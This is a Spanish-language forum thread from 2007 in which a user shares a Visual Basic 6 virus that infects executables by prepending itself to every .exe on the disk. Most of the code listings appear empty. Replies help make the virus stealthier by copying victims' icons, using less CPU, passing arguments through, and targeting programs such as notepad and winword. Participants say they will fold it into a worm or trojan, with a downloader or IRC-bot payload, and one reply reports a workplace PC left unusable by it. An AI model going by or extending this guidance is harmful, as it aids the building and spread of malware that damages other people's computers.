Título: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 4 Abril 2007, 23:02 pm Infección de Ejecutables en Visual Basic 6.0
Bueno, ya he finalizado el proyecto, lo he testeado en una máquina virtual y funciona a la perfección :P Os dejo el código comentado, tambien os dejo una versión compilada del proyecto y un ZIP con el source :) Como funciona? 1- El programa principal busca por el disco duro todos los archivos con extension *.exe 2- Cuando encuentra uno, crea una copia del virus con el siguiente formato: [VIRUS]+Marca+[HUESPED] 3- Cuando se ejecuta un archivo infectado, el virus busca la Marca para separar el [VIRUS] del [HUESPED] y ejecutarlos de forma separada (http://perso.wanadoo.es/madantrax/struct.jpg) Form1.frm Código
InfectModule.bas Código
Encryption.bas Código
Adjunto el código fuente del proyecto. OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!! Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 4 Abril 2007, 23:05 pm Esté código lo programé enterito para el Laboratorio del foro, pedí si podía sacar el código fuera y aquí lo teneis, de pueden mejorar algunas cosillas, vosotros mismos...
Saludos!! Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Hendrix en 4 Abril 2007, 23:19 pm Yo estoy haciendo mi metodo....estoy haciendo pruebas de como substituir el entrypoint del programa por el mio, ya que de tu manera, el icono siempre sera el de TU programa, es decir, el del VB, esto canta mucho, si alguien se mete a buscar algo en su HD y se encuentra con los ejecutables todos con el mismo icono del VB...XDDD
Lo dicho, si logro terminarlo lo posteare, ya que no voy a usar al codigo... Salu2 PD: esto no estaba ya explicado por WarGhost en un papper??? :-\ :-\ Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 4 Abril 2007, 23:24 pm ya que de tu manera, el icono siempre sera el de TU programa, es decir, el del VB, esto canta mucho, si alguien se mete a buscar algo en su HD y se encuentra con los ejecutables todos con el mismo icono del VB...XDDD Exacto, pero eso tiene facil solución... antes de infectar el archivo hay que leer su icono y escribirlo a nuestro código vírico, en mis pruebas con una máquina virtual funciona de maravilla, solo tienes que añadir el módulo de IconChanger.bas que ya postee aqui.Saludos!! PD: esto no estaba ya explicado por WarGhost en un papper??? :-\ :-\ Mi código es del 29 Junio 2006, desconozco si WarGhost lo hizo antes o después. Saludos!! Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Hendrix en 4 Abril 2007, 23:48 pm Ok...lo del icono me extraño, ya que canta mucho, y como no posteaste el modulo del icono pues crei que no lo cambiabas... ;) ;)
Un Saludo. ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: nhaalclkiemr en 5 Abril 2007, 00:20 am Muy bueno, lo provaré :xD (En Virtual PC claro esta) ;D ;D
¿Y que habría que modificar en el codigo para que infectase solo a un .exe determinado? No a todos Y una cosa, esto es una aplicacion o el codigo se lo añadimos por ejemplo a un archivo que tengamos nosotros?? Muy buenos todos tus trabajos Un saludo ;) ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: byebye en 5 Abril 2007, 02:36 am Citar Yo estoy haciendo mi metodo....estoy haciendo pruebas de como substituir el entrypoint del programa por el mio eso no va a funcionar. 1º si es en vb olvidate, si aun asi logras escribir alguna rutina que sirva de algo en otros pcs lo tiene crudo ya que si infectas (lo que es una verdadera infeccion) el codigo se escribe de forma distinta a la "normal" no se puede llamar a las funciones tal cual, por ejemplo: MessageBoxA(..................) <---- Esto no funciona a la hora de una infeccion 2º si infectas un ejecutable no tienes que poner tu entrypoint, dependiendo el metodo de infeccion calcularas de una forma o de otra el inicio de tu codigo en el archivo infectado, ese sera tu entrypoint ahora ya que en una infeccion te "desprendes" de tu cabecera. 3º es aconsejable dejar todos los registros y flags como estaban antes de devolver el control al programa original en vb veo esto poco factible. todo esto suponiendo que quieras hacerlo en vb. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: nhaalclkiemr en 5 Abril 2007, 02:57 am Lo prové y algunos fallos:
-Durante la infeccion consume todos los recursos del sistema, en mi Virtual PC me apareció al advertencia "Minimo de memoria virtual" y tengo establecidos 512MB de RAM. Aunke tarde un poko mas debería actuar en segundo plano...pues puede que la victima desconfie o simlemente se le bloquee y reinicie... -Una vez infectada la victima, las aplicaciones no se ejecutan con parametros, es decir, si abres un documento de texto Windows por defecto ejecuta "notepad.exe %1" pues si esta infectado solo se ejecutará "notepad.exe". Es decir, al abrir un archivo de texto simplemente se abrira el block de notas pero no abrira el archivo seleccionado...lo mismo pasa con archivos de musica y tal... Otro ejemplo, si escribes en ejecuta "cmd.exe /C "tasklist" en verdad te ejecutara "cmd.exe" simplemente se abrira la consola sin hacer nada mas... Otro ejemplo, si dentro de la consola escribes cualquier comando como por ejemplo "taskkill /F /IM proceso.exe" simplemente te ejecutará "taskkill" por lo que en la ventana te aparecerá la ayuda de taskkill (que es lo que este responde cuando lo ejecutas sin parametros) Por esto mismo los .bat tambien quedan inservibles En resumen, los .exe infectados omiten cualquier parametro en su ejecucion... Por el resto todo bien, aun no lo prové demasiado, de momento esos fueron los dos errores mas salientables... Buen trabajo Un saludo ;) ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 5 Abril 2007, 07:03 am En mi máquina virtual el virus no consume tantos recursos, pero eso es tan facil como poner un sleep cada 100 archivos y solucionado.
El tema de los parametros ya era consciente, se puede solucionar de forma sencilla con una función más que recoja los parametros y se los envíe a la aplicación infectada Para terminar, los archivos de system32 (cmd, taskkill, tasklist, etc...) tiene habilitado el SFC de Windows (Sistema de Protección de Archivos), si un virus o similar modifica, sobreescribe o elimina un ejecutable, esté se creará de nuevo pasado unos segundos. Es por eso que no se puede infectar el cmd, explorer, tasklist, etc... Saludos!! Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 5 Abril 2007, 12:27 pm Hola
bua esta mortal nen Yo de siempre habia usado otra técnica, pero esta aparte de mas simple veo que es mas efectiva. Lo unico que no encuentro es lo del IconChanger.bas que dices para mejorarlo. saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: nhaalclkiemr en 5 Abril 2007, 12:44 pm Ahh, en mi maquina virtual tengo el SFC desactivado por lo que si que infecta el cmd.exe y estos archivos...aunke supongo que el explorer.exe y alguno mas no los infectará pork estan en ejecucion...
Sobre los recursos empieza y consume casi toda la CPU y lo deje infgectando y cuando termino miré y estaba la advertencia esa que te dije "minimo de memoria virtual"... ¿¿Podrías modificar el codigo fuente con lo de los parámetros y los recursos arreglado?? ¿Y como puedo hacer para infectar solo a un ejecutable determinado que quiera y no a todos los del sistema? Un saludo ;) ;) ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Hendrix en 5 Abril 2007, 21:06 pm Citar Yo estoy haciendo mi metodo....estoy haciendo pruebas de como substituir el entrypoint del programa por el mio eso no va a funcionar. 1º si es en vb olvidate, si aun asi logras escribir alguna rutina que sirva de algo en otros pcs lo tiene crudo ya que si infectas (lo que es una verdadera infeccion) el codigo se escribe de forma distinta a la "normal" no se puede llamar a las funciones tal cual, por ejemplo: MessageBoxA(..................) <---- Esto no funciona a la hora de una infeccion 2º si infectas un ejecutable no tienes que poner tu entrypoint, dependiendo el metodo de infeccion calcularas de una forma o de otra el inicio de tu codigo en el archivo infectado, ese sera tu entrypoint ahora ya que en una infeccion te "desprendes" de tu cabecera. 3º es aconsejable dejar todos los registros y flags como estaban antes de devolver el control al programa original en vb veo esto poco factible. todo esto suponiendo que quieras hacerlo en vb. Lo ago en C... ;) ;) Ya se que VB no da para tanto... Citar 2º si infectas un ejecutable no tienes que poner tu entrypoint, dependiendo el metodo de infeccion calcularas de una forma o de otra el inicio de tu codigo en el archivo infectado, ese sera tu entrypoint ahora ya que en una infeccion te "desprendes" de tu cabecera. Mi intencion era modificar el EntryPoint del archivo infectado para que apuntara al codigo de mi ejecutable, asi iniciarse el mio y despeus ya generar y ejecutar el otro....recuerdo que el Txernobil (Worm) se alojaba en los espacios "inservibles" de los archvios, de modo que no aumentaba el peso y se ejecutaba perfectamente... Un Saludo. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: ~~ en 6 Abril 2007, 01:14 am Yo ahora tb estoy desarrollando un code de infeccion, q creo, pero no estoy muy seguro q funciona distinto a ese, ya q en propagacion virica no estoy muy puesto.
Soy la idea general, para el q le interese. Lo mio seria mas bien tipo joiner. Copiamos en un archivo el ekivalente al stubb, a continuacion nuestro virus, y al final el ejecutable q hemos infectado. Despues borramos el ejecutable original y nos kedamos con su nombre y su icono. De esta manera al ejecutarse este nuevo ejecutable extraeria el archiv original de si mismo, lo ejecutaria y haria lo mismo con el "virus" o el code q keramos ponerle. Es asi como lo haceis vosotros no?? por q yo eso del entrypoint ni lo e tocado :xD :xD Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: DrakoX en 6 Abril 2007, 03:09 am Muy lindo ||MadAntrax||
me gusto mucho slu2 y gracias PD: Ya toy implementandolo en un wormq hice hace un buen tiempo salu2 Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 6 Abril 2007, 11:28 am acabo de comprobar lo de los iconos la verdad es que si, es un poco cantoso. Algien sugiere algo para evitar ese pequeño fallo saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: DrakoX en 6 Abril 2007, 18:12 pm si,
ya dijiseron que con el modulo del IconChanger se puede arreglar todo salu2 y suerte Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 6 Abril 2007, 19:49 pm tube buscando por el foro pero no encontre nada sobre ese modulo :-[ Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: DrakoX en 6 Abril 2007, 20:07 pm bajate el Catrus Joiner Source,
que ahi tenes el iconChanger salu2 Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 6 Abril 2007, 21:24 pm vale ya tengo el modulo, pero no lo e pillado muy bien, cuales son los parametros para llamar a la funcion ReplaceIcons [icono], [la ruta de donde este el .exe], [lok viene ahora ya no lo entiendo] el problema es que en el codigo del cactus joiner, ya selecionaba el icono (.ico), pero lo que necesitamos aqui es extraerselo a un ejecutable (.exe). saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: DrakoX en 6 Abril 2007, 22:43 pm Citar pero lo que necesitamos aqui es extraerselo a un ejecutable (.exe). ahhh, habermelo dicho antes, proba cn esto: http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=43668&lngWId=1 http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=34062&lngWId=1 http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=22893&lngWId=1 espero q alguno t sirva salu2 y suerte Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 7 Abril 2007, 11:52 am gracias eso me a venido perfecto. Bien ya tengo extraido el icono, ahora lo que necesito es remplazarlo (usare el iconchanger), aver si esta bien asi la estructura: Citar ReplaceIcons picViewIcon.Picture, Victim (picViewIcon.Picture = el_icono ; Victim = la_ruta_del_exe)asi valdria o faltaria ponerle algo mas? saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: DrakoX en 7 Abril 2007, 17:44 pm para el icon changer si no me equivoco,
necesitas tener el archivo .ico para eso utiliza esto: http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=22893&lngWId=1 salu2 Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: LeandroA en 7 Abril 2007, 21:52 pm hola me temo que ninguno de los modulos presentes son eficientes la unica forma de que quede un buen trabajo es trabajar con las apis LoadResource,EnumResourceLanguages,EnumResourceNamesByNum
EnumResourceNamesByString,EnumResourceTypes y especialmente BeginUpdateResource,UpdateResource,EndUpdateResource voy a ver si puedo hacer un modulo para cambiar el icono de un exe por otro exe Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 8 Abril 2007, 00:01 am Hola
ok aver que tal te queda, porque yo desarrole el mio atraves de todo lo que me sugirieron me eran demasiadas lineas, me ongordaba demasiado el bicho saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: slossetti en 9 Abril 2007, 17:40 pm Hola, entro al foro porque alguien entro a la maquina donde yo trabajo y entro a este foro y adrede descargo el codigo en cuestion y me infecto la PC. Buscando algo de información encontre este foro, queria preguntarles de que manera se puede eliminarlo ya que hace imposible usar la PC.
Gracias. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 10 Abril 2007, 08:51 am si nos dices cual es el codigo en cuestion se puede hacer una "vacuna" para el. Si no, busca entre tus procesos y mata el del virus o el que te parezca sospechoso, y luego pasa el AV aver si hace algo de provecho. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: slossetti en 10 Abril 2007, 17:07 pm Es el que hablan en ucestion en este post, que esta para bajar el source.
En cada proceso y archivo que ejecuta la PC se abre una ventana que dice "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot" Saludos. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: byebye en 10 Abril 2007, 19:44 pm pues te pillas un editor hexadecimal y sabiendo el tamaño del archivo pues lo tienes facil de quitar. segun creo recordar decian que estaba hecho para actuar de la siguiente forma virus+marca+programa original. si no se modifica nada en cada infeccion el tamaño es fijo sabiendo el del virus recuperas rapido el original o si no como hay 2 cabeceras las buscas y lo arreglas.
Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 10 Abril 2007, 21:27 pm Es el que hablan en ucestion en este post, que esta para bajar el source. En cada proceso y archivo que ejecuta la PC se abre una ventana que dice "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot" Saludos. Vaya tela, mira que dije claramente: OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!! Bueno, si ha sido con el mismo source de la primera pagina se puede crear una simple vacuna cambiando unos valores... pero ahora mismo no tengo tiempo ni de mirarmelo. Tendrás que esperar al fin de semana o esperar a ver si algu usuario lo hace Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: LeandroA en 14 Abril 2007, 23:45 pm bueno siguiendo con el tema de los iconos, pongo un modulo para cambiar el icono de un exe por el de otro exe, esta un poco extenso ya que no esta echo para este proposito, pero se puede resumir vastante y optimizar mas,
En un modulo bas Código: Option Explicit para provarlo en un formulario con un boton y un exe en c:\ llamdo virus.exe (Aclaro esto es inofencivo no hay problemas solo cambia el icono) Código: Private Sub Command1_Click() algunas apis solo trabajan vajo win XP pero hay substitutos asi que si les interesa se puede mejorar tambien, no lo hice porque no tengo win 98 y no sabia si iva a funcionar, pero cualquier cosa lo vemos y lo modificamos Saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: ~~ en 15 Abril 2007, 12:16 pm Gracias LeandroA esta muy bien ese source, wena aportacion, ahora mismo lo pruevo, q me viene de lujo ;D ;D
Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 16 Abril 2007, 21:11 pm cuando trato de compilar el codigo para probarlo en mi maquina virtual, me marca un error en esta linea: If UBound(Buffer) = 1 Then Dice el error "Se esperaba matrix" donde esta el fallo, el codigo lo mantube igual, no me complique para probarlo Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 18 Abril 2007, 13:21 pm soy al unico que le a marcado ese error? saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Hendrix en 18 Abril 2007, 13:33 pm La funcion UBound devuelve el numero de indices que tiene un array, si Buffer no es un array (supongo que no lo sera) da el error que te da... ;) ;)
Para evitarlo asegurate de que Buffer es un array. Un Saludo. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Saok Dagon en 18 Abril 2007, 19:58 pm gracias hendrix lo tenia definido de esta manera dim buffer as string me falto añadirle dim buffer() as string saludos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: jackl007 en 7 Mayo 2007, 02:41 am Si termino de hacerlo q el mismo infecEXE no deje su rastro del icono, lo posteo...
pero mientras tanto averiguo como lo puedo hacer... si alguno lo termina o lo hace... lo postea... Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Happy-word en 8 Mayo 2007, 19:02 pm yo boy mas con lo que dice EON yo hice el mio asi con las caracteristicas de un joiner y asi siempre queda con su icono y no se ve tan mamon el archivo infectado.
---------- Huesped.. ---------- Virus.. ----------- "XD" **marca virica** al ejecutar el archivo infectado este se desconpone y crea solamente el huesped mientras que el archivo original sigue infectado. XD (http://img471.imageshack.us/img471/5215/mypictr440x1252ps2.jpg) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: LeandroA en 8 Mayo 2007, 19:48 pm yo boy mas con lo que dice EON yo hice el mio asi con las caracteristicas de un joiner y asi siempre queda con su icono y no se ve tan mamon el archivo infectado. ---------- Huesped.. ---------- Virus.. ----------- "XD" **marca virica** al ejecutar el archivo infectado este se desconpone y crea solamente el huesped mientras que el archivo original sigue infectado. XD (http://img471.imageshack.us/img471/5215/mypictr440x1252ps2.jpg) y como se supone que se ejecuta el virus si esta escrito despues del huesped, me parece que estas equivocado. Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: ~~ en 9 Mayo 2007, 15:39 pm Si :xD pero es q yo no dije eso :xD :xD La primera parte seria el stub (por llamarlo asi) q se encargaria de dividir las otras dos y ejecutarlas o de hacer todas las funciones q se te ocurran..
Código: ---------- Stub Se autolee, se parte, y ejecuta los dos trozos Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Freeze. en 11 Julio 2007, 17:50 pm Hola no quiero ser ignorante pero para que sirve este codigo???
Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: nhaalclkiemr en 11 Julio 2007, 20:43 pm Hola, este codigo está muy bien, pero digo en varias cosas que podría mejorar y que estarían muy bien:
-Que los parametros se pasen también al archivo infectado, pues si ejecutas por ejemplo ping 127.0.0.1 -n1 y el archivo ping.exe está infectado se ejecutaría simplemente ping -Que sea el virus el que se descomprime en la ruta temporal y no el programa original, pues en caso de que por ejemplo un programa buscase los archivos que necesita para funcionar en su mismo directorio al estar en temp no los encontraría. Después me gustaría saber como se podría hacer esto: -Que no infecte a una carpeta (subcarpetas y archivos :xD) determinada o que solo infecte a una determinada -Que busque el nombre de un programa en concreto y solo infecte a ese. Es que me gustaría añadir esto a un troyano y weno, me gustaría saber como podría hacer esto. Saludos ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 11 Julio 2007, 20:49 pm -Que busque el nombre de un programa en concreto y solo infecte a ese. Aqui tienes para lo del nombre: Código Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com Citar -Que no infecte a una carpeta (subcarpetas y archivos :xD) determinada o que solo infecte a una determinada Este es más complicado, pero creo que debería suprimir la parte del final:Código
Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)" Ojo que esto último no lo he probado Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: nhaalclkiemr en 11 Julio 2007, 21:34 pm Gracias, cuando pueda ya pruevo. Y encontraste alguna manera de como pasar los parametros al programa original. Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.
Sludos y gracias por todo ;) Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 11 Julio 2007, 22:32 pm Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está. Existe una variable de VB6 llamada: Código
Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!! Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Freeze. en 11 Julio 2007, 22:35 pm ||MadAntrax||
Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado) o es manual o.O?? Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Mad Antrax en 11 Julio 2007, 22:40 pm ||MadAntrax|| Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado) o es manual o.O?? Instalado Mod para Programación/Programadores GeSHi https://foro.elhacker.net/index.php/topic,170103.0.html Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Freeze. en 11 Julio 2007, 22:40 pm Ok Muchas gracias.!!
Título: Re: [Source] Infección de ejecutables en VB6 Publicado por: Freeze. en 11 Julio 2007, 22:44 pm Disculpen el 2ble post.:
y Tambien disculpen desviar el hilo... ¿Como se usa? Código
no no se... |